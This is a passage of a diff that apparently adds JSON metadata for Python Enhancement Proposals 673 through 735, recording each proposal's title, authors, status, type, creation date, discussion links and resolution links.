"typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "10-Nov-2021", + "python_version": "3.11", + "post_history": "17-Nov-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/J7BWL5KWOPQQK5KFWKENVLXW6UGSPTGI/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0673/" + }, + "674": { + "number": 674, + "title": "Disallow using macros as l-values", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "30-Nov-2021", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0674/" + }, + "675": { + "number": 675, + "title": "Arbitrary Literal String Type", + "authors": "Pradeep Kumar Srinivasan, Graham Bleaney", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/VB74EHNM4RODDFM64NEEEBJQVAUAWIAW/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Nov-2021", + "python_version": "3.11", + "post_history": "07-Feb-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/XEOOSSPNYPGZ5NXOJFPLXG2BTN7EVRT5/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0675/" + }, + "676": { + "number": 676, + "title": "PEP Infrastructure Process", + "authors": "Adam Turner", + "discussions_to": "https://discuss.python.org/t/10774", + "status": "Active", + "type": "Process", + "topic": "", + "created": "01-Nov-2021", + "python_version": null, + "post_history": "23-Sep-2021, 30-Nov-2021", + "resolution": "https://discuss.python.org/t/10774/99", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0676/" + }, + "677": { + "number": 677, + "title": "Callable 
Type Syntax", + "authors": "Steven Troxler, Pradeep Kumar Srinivasan", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "typing", + "created": "13-Dec-2021", + "python_version": "3.11", + "post_history": "16-Dec-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/NHCLHCU2XCWTBGF732WESMN42YYVKOXB/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0677/" + }, + "678": { + "number": 678, + "title": "Enriching Exceptions with Notes", + "authors": "Zac Hatfield-Dodds", + "discussions_to": "https://discuss.python.org/t/pep-678-enriching-exceptions-with-notes/13374", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2021", + "python_version": "3.11", + "post_history": "`27-Jan-2022 `__", + "resolution": "https://discuss.python.org/t/pep-678-enriching-exceptions-with-notes/13374/100", + "requires": "654", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0678/" + }, + "679": { + "number": 679, + "title": "Allow parentheses in assert statements", + "authors": "Pablo Galindo Salgado", + "discussions_to": "https://discuss.python.org/t/pep-679-allow-parentheses-in-assert-statements/13003", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "07-Jan-2022", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0679/" + }, + "680": { + "number": 680, + "title": "tomllib: Support for Parsing TOML in the Standard Library", + "authors": "Taneli Hukkinen, Shantanu Jain", + "discussions_to": "https://discuss.python.org/t/13040", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2022", + "python_version": "3.11", + "post_history": "`09-Dec-2021 `__, `27-Jan-2022 `__,", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/3AHGWYY562HHO55L4Z2OVYUFZP5W73IS/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0680/" + }, + "681": { + "number": 681, + "title": "Data Class Transforms", + "authors": "Erik De Bonte, Eric Traut", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/EAALIHA3XEDFDNG2NRXTI3ERFPAD65Z4/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "02-Dec-2021", + "python_version": "3.11", + "post_history": "`24-Apr-2021 `__, `13-Dec-2021 `__, `22-Feb-2022 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/R4A2IYLGFHKFDYJPSDA5NFJ6N7KRPJ6D/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0681/" + }, + "682": { + "number": 682, + "title": "Format Specifier for Signed Zero", + "authors": "John Belmonte", + "discussions_to": "https://discuss.python.org/t/pep-682-format-specifier-for-signed-zero/13596", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jan-2022", + "python_version": "3.11", + "post_history": "08-Feb-2022", + "resolution": "https://discuss.python.org/t/accepting-pep-682-format-specifier-for-signed-zero/14088", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0682/" + }, + "683": { + "number": 683, + "title": "Immortal Objects, Using a Fixed Refcount", + 
"authors": "Eric Snow, Eddie Elizondo", + "discussions_to": "https://discuss.python.org/t/18183", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2022", + "python_version": "3.12", + "post_history": "`16-Feb-2022 `__, `19-Feb-2022 `__, `28-Feb-2022 `__, `12-Aug-2022 `__,", + "resolution": "https://discuss.python.org/t/18183/26", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0683/" + }, + "684": { + "number": 684, + "title": "A Per-Interpreter GIL", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-684-a-per-interpreter-gil/19583", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2022", + "python_version": "3.12", + "post_history": "`08-Mar-2022 `__, `29-Sep-2022 `__, `28-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/19583/42", + "requires": "683", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0684/" + }, + "685": { + "number": 685, + "title": "Comparison of extra names for optional distribution dependencies", + "authors": "Brett Cannon", + "discussions_to": "https://discuss.python.org/t/14141", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Mar-2022", + "python_version": null, + "post_history": "`08-Mar-2022 `__", + "resolution": "https://discuss.python.org/t/pep-685-comparison-of-extra-names-for-optional-distribution-dependencies/14141/55", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0685/" + }, + "686": { + "number": 686, + "title": "Make UTF-8 mode default", + "authors": "Inada Naoki", + "discussions_to": "https://discuss.python.org/t/14737", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "18-Mar-2022", + "python_version": "3.15", + "post_history": "`18-Mar-2022 `__, `31-Mar-2022 `__", + "resolution": "https://discuss.python.org/t/14737/9", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0686/" + }, + "687": { + "number": 687, + "title": "Isolating modules in the standard library", + "authors": "Erlend Egeberg Aasland, Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/14824", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "04-Apr-2022", + "python_version": "3.12", + "post_history": "`04-Apr-2022 `__, `11-Apr-2022 `__", + "resolution": "https://discuss.python.org/t/14824/4", + "requires": "489, 573, 630", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0687/" + }, + "688": { + "number": 688, + "title": "Making the buffer protocol accessible in Python", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/19756", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "23-Apr-2022", + "python_version": "3.12", + "post_history": "`23-Apr-2022 `__, `25-Apr-2022 `__, `06-Oct-2022 `__, `26-Oct-2022 `__", + "resolution": "`07-Mar-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0688/" + }, + "689": { + "number": 689, + "title": "Unstable C API tier", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-689-unstable-c-api-tier/20452", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2022", + "python_version": "3.12", + 
"post_history": "`27-Apr-2022 `__, `25-Aug-2022 `__, `27-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-689-unstable-c-api-tier/20452/13", + "requires": "523", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0689/" + }, + "690": { + "number": 690, + "title": "Lazy Imports", + "authors": "Germ\u00e1n M\u00e9ndez Bravo, Carl Meyer", + "discussions_to": "https://discuss.python.org/t/pep-690-lazy-imports/15474", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2022", + "python_version": "3.12", + "post_history": "`03-May-2022 `__, `03-May-2022 `__", + "resolution": "https://discuss.python.org/t/pep-690-lazy-imports-again/19661/26", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0690/" + }, + "691": { + "number": 691, + "title": "JSON-based Simple API for Python Package Indexes", + "authors": "Donald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/pep-691-json-based-simple-api-for-python-package-indexes/15553", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "04-May-2022", + "python_version": null, + "post_history": "`05-May-2022 `__", + "resolution": "https://discuss.python.org/t/pep-691-json-based-simple-api-for-python-package-indexes/15553/70", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0691/" + }, + "692": { + "number": 692, + "title": "Using TypedDict for more precise \\*\\*kwargs typing", + "authors": "Franek Magiera", + "discussions_to": "https://discuss.python.org/t/pep-692-using-typeddict-for-more-precise-kwargs-typing/17314", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "29-May-2022", + "python_version": "3.12", + "post_history": "`29-May-2022 `__, `12-Jul-2022 `__, `12-Jul-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-692-using-typeddict-for-more-precise-kwargs-typing/17314/81", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0692/" + }, + "693": { + "number": 693, + "title": "Python 3.12 Release Schedule", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "24-May-2022", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0693/" + }, + "694": { + "number": 694, + "title": "Upload 2.0 API for Python Package Repositories", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/pep-694-upload-2-0-api-for-python-package-repositories/16879", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Jun-2022", + "python_version": null, + "post_history": "`27-Jun-2022 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0694/" + }, + "695": { + "number": 695, + "title": "Type Parameter Syntax", + "authors": "Eric Traut", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/BB2BGYJY2YG5IWESKGTAPUQL3N27ZKVW/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "15-Jun-2022", + "python_version": "3.12", + "post_history": "`20-Jun-2022 `__, `04-Dec-2022 `__", + "resolution": 
"https://discuss.python.org/t/pep-695-type-parameter-syntax/21646/92", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0695/" + }, + "696": { + "number": 696, + "title": "Type Defaults for Type Parameters", + "authors": "James Hilton-Balfe", + "discussions_to": "https://discuss.python.org/t/pep-696-type-defaults-for-typevarlikes/22569", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "14-Jul-2022", + "python_version": "3.13", + "post_history": "`22-Mar-2022 `__, `08-Jan-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-696-type-defaults-for-typevarlikes/22569/34", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0696/" + }, + "697": { + "number": 697, + "title": "Limited C API for Extending Opaque Types", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/19743", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Aug-2022", + "python_version": "3.12", + "post_history": "`24-May-2022 `__, `06-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/19743/30", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0697/" + }, + "698": { + "number": 698, + "title": "Override Decorator for Static Typing", + "authors": "Steven Troxler, Joshua Xu, Shannon Zhu", + "discussions_to": "https://discuss.python.org/t/pep-698-a-typing-override-decorator/20839", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "05-Sep-2022", + "python_version": "3.12", + "post_history": "`20-May-2022 `__, `17-Aug-2022 `__, `11-Oct-2022 `__, `07-Nov-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-698-a-typing-override-decorator/20839/11", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0698/" + }, + "699": { + "number": 699, + "title": "Remove private dict version field added in PEP 509", + "authors": "Ken Jin", + "discussions_to": "https://discuss.python.org/t/pep-699-remove-private-dict-version-field-added-in-pep-509/19724", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "03-Oct-2022", + "python_version": "3.12", + "post_history": "`05-Oct-2022 `__", + "resolution": "https://discuss.python.org/t/pep-699-remove-private-dict-version-field-added-in-pep-509/19724/13", + "requires": null, + "replaces": "509", + "superseded_by": null, + "url": "https://peps.python.org/pep-0699/" + }, + "700": { + "number": 700, + "title": "Additional Fields for the Simple API for Package Indexes", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/pep-700-additional-fields-for-the-simple-api-for-package-indexes/20177", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Oct-2022", + "python_version": null, + "post_history": "`21-Oct-2022 `__", + "resolution": "`19-Dec-2022 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0700/" + }, + "701": { + "number": 701, + "title": "Syntactic formalization of f-strings", + "authors": "Pablo Galindo, Batuhan Taskaya, Lysandros Nikolaou, Marta G\u00f3mez Mac\u00edas", + "discussions_to": "https://discuss.python.org/t/pep-701-syntactic-formalization-of-f-strings/22046", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2022", + "python_version": 
"3.12", + "post_history": "`19-Dec-2022 `__,", + "resolution": "`14-Mar-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0701/" + }, + "702": { + "number": 702, + "title": "Marking deprecations using the type system", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-702-marking-deprecations-using-the-type-system/23036", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Dec-2022", + "python_version": "3.13", + "post_history": "`01-Jan-2023 `__, `22-Jan-2023 `__", + "resolution": "`07-Nov-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0702/" + }, + "703": { + "number": 703, + "title": "Making the Global Interpreter Lock Optional in CPython", + "authors": "Sam Gross", + "discussions_to": "https://discuss.python.org/t/22606", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "09-Jan-2023", + "python_version": "3.13", + "post_history": "`09-Jan-2023 `__, `04-May-2023 `__", + "resolution": "`24-Oct-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0703/" + }, + "704": { + "number": 704, + "title": "Require virtual environments by default for package installers", + "authors": "Pradyun Gedam", + "discussions_to": "https://discuss.python.org/t/22846", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jan-2023", + "python_version": null, + "post_history": "`16-Jan-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0704/" + }, + "705": { + "number": 705, + "title": "TypedDict: Read-only items", + "authors": "Alice Purcell", + "discussions_to": "https://discuss.python.org/t/pep-705-read-only-typeddict-items/37867", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Nov-2022", + "python_version": "3.13", + "post_history": "`30-Sep-2022 `__, `02-Nov-2022 `__, `14-Mar-2023 `__, `17-Oct-2023 `__, `04-Nov-2023 `__,", + "resolution": "`29-Feb-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0705/" + }, + "706": { + "number": 706, + "title": "Filter for tarfile.extractall", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/23903", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2023", + "python_version": "3.12", + "post_history": "`25-Jan-2023 `__, `15-Feb-2023 `__,", + "resolution": "https://discuss.python.org/t/23903/10", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0706/" + }, + "707": { + "number": 707, + "title": "A simplified signature for __exit__ and __aexit__", + "authors": "Irit Katriel", + "discussions_to": "https://discuss.python.org/t/24402", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Feb-2023", + "python_version": "3.12", + "post_history": "`02-Mar-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-707-a-simplified-signature-for-exit-and-aexit/24402/46", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0707/" + }, + "708": { + "number": 708, + "title": "Extending the Repository API to Mitigate Dependency Confusion Attacks", + "authors": 
"Donald Stufft", + "discussions_to": "https://discuss.python.org/t/24179", + "status": "Provisional", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Feb-2023", + "python_version": null, + "post_history": "`01-Feb-2023 `__, `23-Feb-2023 `__", + "resolution": "https://discuss.python.org/t/24179/72", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0708/" + }, + "709": { + "number": 709, + "title": "Inlined comprehensions", + "authors": "Carl Meyer", + "discussions_to": "https://discuss.python.org/t/pep-709-inlined-comprehensions/24240", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Feb-2023", + "python_version": "3.12", + "post_history": "`25-Feb-2023 `__", + "resolution": "https://discuss.python.org/t/pep-709-inlined-comprehensions/24240/36", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0709/" + }, + "710": { + "number": 710, + "title": "Recording the provenance of installed packages", + "authors": "Fridol\u00edn Pokorn\u00fd", + "discussions_to": "https://discuss.python.org/t/pep-710-recording-the-provenance-of-installed-packages/25428", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Mar-2023", + "python_version": null, + "post_history": "`03-Dec-2021 `__, `30-Jan-2023 `__, `14-Mar-2023 `__, `03-Apr-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0710/" + }, + "711": { + "number": 711, + "title": "PyBI: a standard format for distributing Python Binaries", + "authors": "Nathaniel J. Smith", + "discussions_to": "https://discuss.python.org/t/pep-711-pybi-a-standard-format-for-distributing-python-binaries/25547", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Apr-2023", + "python_version": null, + "post_history": "`06-Apr-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0711/" + }, + "712": { + "number": 712, + "title": "Adding a \"converter\" parameter to dataclasses.field", + "authors": "Joshua Cannon", + "discussions_to": "https://discuss.python.org/t/pep-712-adding-a-converter-parameter-to-dataclasses-field/26126", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2023", + "python_version": "3.13", + "post_history": "`27-Dec-2022 `__, `19-Jan-2023 `__, `23-Apr-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-712-adding-a-converter-parameter-to-dataclasses-field/26126/98", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0712/" + }, + "713": { + "number": 713, + "title": "Callable Modules", + "authors": "Amethyst Reese", + "discussions_to": "https://discuss.python.org/t/pep-713-callable-modules/26127", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Apr-2023", + "python_version": "3.12", + "post_history": "`23-Apr-2023 `__", + "resolution": "https://discuss.python.org/t/26127/86", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0713/" + }, + "714": { + "number": 714, + "title": "Rename dist-info-metadata in the Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/27471", + "status": "Accepted", + "type": "Standards Track", + 
"topic": "packaging", + "created": "06-Jun-2023", + "python_version": null, + "post_history": "`06-Jun-2023 `__", + "resolution": "`27-Jun-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0714/" + }, + "715": { + "number": 715, + "title": "Disabling bdist_egg distribution uploads on PyPI", + "authors": "William Woodruff", + "discussions_to": "https://discuss.python.org/t/27610", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "06-Jun-2023", + "python_version": null, + "post_history": "`09-Jun-2023 `__", + "resolution": "`24-Jun-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0715/" + }, + "718": { + "number": 718, + "title": "Subscriptable functions", + "authors": "James Hilton-Balfe", + "discussions_to": "https://discuss.python.org/t/28457/", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "23-Jun-2023", + "python_version": "3.13", + "post_history": "`24-Jun-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0718/" + }, + "719": { + "number": 719, + "title": "Python 3.13 Release Schedule", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "26-May-2023", + "python_version": "3.13", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0719/" + }, + "720": { + "number": 720, + "title": "Cross-compiling Python packages", + "authors": "Filipe La\u00edns", + "discussions_to": null, + "status": "Draft", + "type": "Informational", + "topic": "", + "created": "01-Jul-2023", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0720/" + }, + "721": { + "number": 721, + "title": "Using tarfile.data_filter for source distribution extraction", + "authors": "Petr Viktorin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Jul-2023", + "python_version": "3.12", + "post_history": "`04-Jul-2023 `__,", + "resolution": "`02-Aug-2023 `__", + "requires": "706", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0721/" + }, + "722": { + "number": 722, + "title": "Dependency specification for single-file scripts", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/29905", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "19-Jul-2023", + "python_version": null, + "post_history": "`19-Jul-2023 `__", + "resolution": "https://discuss.python.org/t/pep-722-723-decision/36763/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0722/" + }, + "723": { + "number": 723, + "title": "Inline script metadata", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/31151", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Aug-2023", + "python_version": null, + "post_history": "`04-Aug-2023 `__, `06-Aug-2023 `__, `23-Aug-2023 `__, `06-Dec-2023 `__,", + "resolution": "`08-Jan-2024 `__", + "requires": null, + "replaces": "722", + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0723/" + }, + "724": { + "number": 724, + "title": "Stricter Type Guards", + "authors": "Rich Chiodo, Eric Traut, Erik De Bonte", + "discussions_to": "https://discuss.python.org/t/pep-724-stricter-type-guards/34124", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "typing", + "created": "28-Jul-2023", + "python_version": "3.13", + "post_history": "`30-Dec-2021 `__, `19-Sep-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0724/" + }, + "725": { + "number": 725, + "title": "Specifying external dependencies in pyproject.toml", + "authors": "Pradyun Gedam, Ralf Gommers", + "discussions_to": "https://discuss.python.org/t/31888", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "17-Aug-2023", + "python_version": null, + "post_history": "`18-Aug-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0725/" + }, + "726": { + "number": 726, + "title": "Module ``__setattr__`` and ``__delattr__``", + "authors": "Sergey B Kirpichev", + "discussions_to": "https://discuss.python.org/t/32640/", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2023", + "python_version": "3.13", + "post_history": "`06-Apr-2023 `__, `31-Aug-2023 `__,", + "resolution": "https://discuss.python.org/t/32640/32", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0726/" + }, + "727": { + "number": 727, + "title": "Documentation in Annotated Metadata", + "authors": "Sebasti\u00e1n Ram\u00edrez", + "discussions_to": "https://discuss.python.org/t/32566", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "28-Aug-2023", + "python_version": "3.13", + "post_history": "`30-Aug-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0727/" + }, + "728": { + "number": 728, + "title": "TypedDict with Typed Extra Items", + "authors": "Zixuan James Li", + "discussions_to": "https://discuss.python.org/t/pep-728-typeddict-with-typed-extra-items/45443", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "12-Sep-2023", + "python_version": "3.14", + "post_history": "`09-Feb-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0728/" + }, + "729": { + "number": 729, + "title": "Typing governance process", + "authors": "Jelle Zijlstra, Shantanu Jain", + "discussions_to": "https://discuss.python.org/t/pep-729-typing-governance-process/35362", + "status": "Active", + "type": "Process", + "topic": "governance, typing", + "created": "19-Sep-2023", + "python_version": null, + "post_history": "`04-Oct-2023 `__, `20-Sep-2023 `__", + "resolution": "`20-Nov-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0729/" + }, + "730": { + "number": 730, + "title": "Adding iOS as a supported platform", + "authors": "Russell Keith-Magee", + "discussions_to": "https://discuss.python.org/t/pep730-adding-ios-as-a-supported-platform/35854", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Oct-2023", + "python_version": "3.13", + "post_history": null, + "resolution": 
"https://discuss.python.org/t/pep-730-adding-ios-as-a-supported-platform/35854/66", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0730/" + }, + "731": { + "number": 731, + "title": "C API Working Group Charter", + "authors": "Guido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel", + "discussions_to": "https://discuss.python.org/t/pep-731-c-api-working-group-charter/36117", + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "11-Oct-2023", + "python_version": null, + "post_history": "`13-Oct-2023 `__, `23-May-2024 `__, `19-Jun-2024 `__", + "resolution": "https://discuss.python.org/t/pep-731-c-api-working-group-charter/36117/12", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0731/" + }, + "732": { + "number": 732, + "title": "The Python Documentation Editorial Board", + "authors": "Joanna Jablonski", + "discussions_to": "https://discuss.python.org/t/pep-732-the-python-documentation-editorial-board/36710", + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "14-Oct-2023", + "python_version": null, + "post_history": "`20-Oct-2023 `__", + "resolution": "https://discuss.python.org/t/pep-732-the-python-documentation-editorial-board/36710/9", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0732/" + }, + "733": { + "number": 733, + "title": "An Evaluation of Python's Public C API", + "authors": "Erlend Egeberg Aasland, Domenico Andreoli, Stefan Behnel, Carl Friedrich Bolz-Tereick, Simon Cross, Steve Dower, Tim Felgentreff, David Hewitt, Shantanu Jain, Wenzel Jakob, Irit Katriel, Marc-Andre Lemburg, Donghee Na, Karl Nelson, Ronald Oussoren, Antoine Pitrou, Neil Schemenauer, Mark Shannon, Stepan Sindelar, Gregory P. 
Smith, Eric Snow, Victor Stinner, Guido van Rossum, Petr Viktorin, Carol Willing, William Woodruff, David Woods, Jelle Zijlstra", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "16-Oct-2023", + "python_version": null, + "post_history": "`01-Nov-2023 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0733/" + }, + "734": { + "number": 734, + "title": "Multiple Interpreters in the Stdlib", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-734-multiple-interpreters-in-the-stdlib/41147", + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "06-Nov-2023", + "python_version": "3.13", + "post_history": "`14-Dec-2023 `__,", + "resolution": "https://discuss.python.org/t/pep-734-multiple-interpreters-in-the-stdlib/41147/24", + "requires": null, + "replaces": "554", + "superseded_by": null, + "url": "https://peps.python.org/pep-0734/" + }, + "735": { + "number": 735, + "title": "Dependency Groups in pyproject.toml", + "authors": "Stephen Rosen", + "discussions_to": "https://discuss.python.org/t/39233", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Nov-2023", + "python_version": null, + "post_history": "`14-Nov-2023 `__, `20-Nov-2023 